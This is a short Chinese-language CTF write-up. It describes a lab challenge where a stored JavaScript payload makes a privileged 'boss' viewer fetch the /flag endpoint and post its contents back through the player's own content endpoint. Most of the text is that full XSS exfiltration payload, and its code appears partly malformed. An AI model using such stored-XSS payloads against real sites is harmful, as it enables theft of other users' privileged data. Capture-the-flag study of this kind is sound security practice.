- 进入靶机之后是一个登录页面。随便登录就能进入
即使使用相同的账号密码,每次登录进去得到的接口也不一样
- 目录扫描可以发现存在一个
/flag
接口。但是需要boss身份才能读取到内容 - 登录进去后的页面有更新计划功能,允许我们将js代码插入当前页面中
- 同时将页面提交给boss的时候。boss会查看我们的内容
思路分析:
插入js代码,使js代码具有
自动读取/flag接口的内容 ==> 同时将读取到的内容利用我们自己的更新计划功能提交一遍
的功能然后提交。
payload:
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>Content Display</title>
</head>
<body><div id="flag-content">Loading...</div><script>fetch('/flag').then(response => {if (!response.ok) {throw new Error('Network response was not ok');}return response.text(); // 获取响应文本}).then(data => {document.getElementById('flag-content').innerText = data;fetch('/content/917420be0d2e454937b1001cfad79b29', {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded'},body: new URLSearchParams({ content: data })}).then(response => {if (!response.ok) {throw new Error('Network response was not ok');}return response.text();}).then(data => {document.getElementById('response').innerText = data;}).catch(error => {console.error('Error sending POST request:', error);document.getElementById('response').innerText = 'Error sending request.';});}).then(response => {if (!response.ok) {throw new Error('Network response was not ok for POST');}return response.text(); }).then(postResponse => {console.log('POST response:', postResponse);}).catch(error => {console.error('Error:', error);document.getElementById('flag-content').innerText = 'Error loading content';});</script>
</body>
</html>
/content/917420be0d2e454937b1001cfad79b29
内容与自己获取到的保持一致
在数据包里面插入js代码